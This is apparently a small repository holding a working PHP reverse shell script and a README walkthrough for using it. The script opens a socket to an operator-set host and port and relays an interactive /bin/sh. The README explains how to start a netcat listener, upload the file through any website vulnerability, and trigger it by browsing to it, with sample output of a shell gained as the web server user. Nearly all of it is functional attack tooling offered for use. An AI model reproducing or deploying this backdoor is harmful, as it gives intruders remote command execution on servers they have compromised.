├── PHP-Reverse-Shell.php
└── README.md


/PHP-Reverse-Shell.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | // PHP Reverse Shell
  3 | // Copyright (C) 2024 e@hotmail.com
  4 | // AbuDayeh
  5 | 
  6 | set_time_limit(0);
  7 | $ip = '127.0.0.1'; // Change this to your IP address
  8 | $port = 1234;      // Change this to your port
  9 | $shell = 'uname -a; w; id; /bin/sh -i';
 10 | $chunk_size = 1400;
 11 | $daemon = 0;
 12 | $debug = 0;
 13 | 
 14 | /**
 15 |  * Print a message if not in daemon mode
 16 |  * @param string $string
 17 |  */
 18 | function printit($string)
 19 | {
 20 |     global $daemon;
 21 |     if (!$daemon) {
 22 |         echo "$string\n";
 23 |     }
 24 | }
 25 | 
 26 | /**
 27 |  * Try to daemonize the process
 28 |  * @return bool
 29 |  */
 30 | function daemonize()
 31 | {
 32 |     if (function_exists('pcntl_fork')) {
 33 |         $pid = pcntl_fork();
 34 |         if ($pid == -1) {
 35 |             printit("ERROR: Can't fork");
 36 |             exit(1);
 37 |         }
 38 |         if ($pid) {
 39 |             exit(0); // Parent exits
 40 |         }
 41 |         if (posix_setsid() == -1) {
 42 |             printit("ERROR: Can't setsid()");
 43 |             exit(1);
 44 |         }
 45 |         return true;
 46 |     } else {
 47 |         printit("WARNING: Failed to daemonize. This is quite common and not fatal.");
 48 |         return false;
 49 |     }
 50 | }
 51 | 
 52 | // Daemonize the process if possible
 53 | $daemon = daemonize();
 54 | 
 55 | chdir("/");
 56 | umask(0);
 57 | 
 58 | // Open the socket connection
 59 | $sock = fsockopen($ip, $port, $errno, $errstr, 30);
 60 | if (!$sock) {
 61 |     printit("$errstr ($errno)");
 62 |     exit(1);
 63 | }
 64 | 
 65 | // Define the descriptors for the process
 66 | $descriptorspec = [
 67 |     0 => ["pipe", "r"], // stdin
 68 |     1 => ["pipe", "w"], // stdout
 69 |     2 => ["pipe", "w"]  // stderr
 70 | ];
 71 | 
 72 | // Spawn the shell process
 73 | $process = proc_open($shell, $descriptorspec, $pipes);
 74 | if (!is_resource($process)) {
 75 |     printit("ERROR: Can't spawn shell");
 76 |     exit(1);
 77 | }
 78 | 
 79 | // Set the streams to non-blocking mode
 80 | foreach ($pipes as $pipe) {
 81 |     stream_set_blocking($pipe, 0);
 82 | }
 83 | stream_set_blocking($sock, 0);
 84 | 
 85 | printit("Successfully opened reverse shell to $ip:$port");
 86 | 
 87 | // Main loop to handle communication
 88 | while (1) {
 89 |     if (feof($sock)) {
 90 |         printit("ERROR: Shell connection terminated");
 91 |         break;
 92 |     }
 93 |     if (feof($pipes[1])) {
 94 |         printit("ERROR: Shell process terminated");
 95 |         break;
 96 |     }
 97 | 
 98 |     $read_a = [$sock, $pipes[1], $pipes[2]];
 99 |     $num_changed_sockets = stream_select($read_a, $write_a = null, $error_a = null, null);
100 | 
101 |     if ($num_changed_sockets === false) {
102 |         printit("ERROR: stream_select failed");
103 |         break;
104 |     }
105 | 
106 |     if (in_array($sock, $read_a)) {
107 |         $input = fread($sock, $chunk_size);
108 |         fwrite($pipes[0], $input);
109 |     }
110 | 
111 |     if (in_array($pipes[1], $read_a)) {
112 |         $output = fread($pipes[1], $chunk_size);
113 |         fwrite($sock, $output);
114 |     }
115 | 
116 |     if (in_array($pipes[2], $read_a)) {
117 |         $error_output = fread($pipes[2], $chunk_size);
118 |         fwrite($sock, $error_output);
119 |     }
120 | }
121 | 
122 | // Clean up
123 | fclose($sock);
124 | foreach ($pipes as $pipe) {
125 |     fclose($pipe);
126 | }
127 | proc_close($process);
128 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Walk Through
 2 | - [x] **Modify the source**
 3 | - To prevent someone else from abusing your backdoor – a nightmare scenario while pentesting – you need to modify the source code to indicate where you want the reverse shell thrown back to.  Edit the following lines of php-reverse-shell.php:
 4 | ______________
 5 | | Variable      | Default                | Personal?                       |
 6 | | ------------- |:----------------------:| -------------------------------:|
 7 | | $ip           | __127.0.0.1__          | Edit __line 7__                 |
 8 | | $port         | __1234__               | Edit __line 8__                 |
 9 | ______________
10 | 
11 | - [x] **Get Ready to catch the reverse shell**
12 | - Start a TCP listener on a host and port that will be accessible by the web server.  Use the same port here as you specified in the script (1234 in this example):
13 | ```
14 | $ nc -v -n -l -p 1234
15 | ```
16 | - [x] **Upload and Run the script**
17 | - Using whatever vulnerability you’ve discovered in the website, upload php-reverse-shell.php.  Run the script simply by browsing to the newly uploaded file in your web browser (NB: You won’t see any output on the web page, it’ll just hang if successful):
18 | ```
19 | http://somesite/php-reverse-shell.php
20 | ```
21 | - [x] **Enjoy your new shell**
22 | - If all went well, the web server should have thrown back a shell to your netcat listener.  Some useful commans such as w, uname -a, id and pwd are run automatically for you:
23 | ```
24 | $ nc -v -n -l -p 1234
25 | listening on [any] 1234 ...
26 | connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 58012
27 | Linux somehost 2.6.19-gentoo-r5 #1 SMP PREEMPT Sun Apr 1 16:49:38 BST 2007 x86_64 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux
28 |  16:59:28 up 39 days, 19:54,  2 users,  load average: 0.18, 0.13, 0.10
29 | USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
30 | root   :0        19May07 ?xdm?   5:10m  0.01s /bin/sh
31 | uid=81(apache) gid=81(apache) groups=81(apache)
32 | sh: no job control in this shell
33 | sh-3.2$
34 | ```
35 | 


--------------------------------------------------------------------------------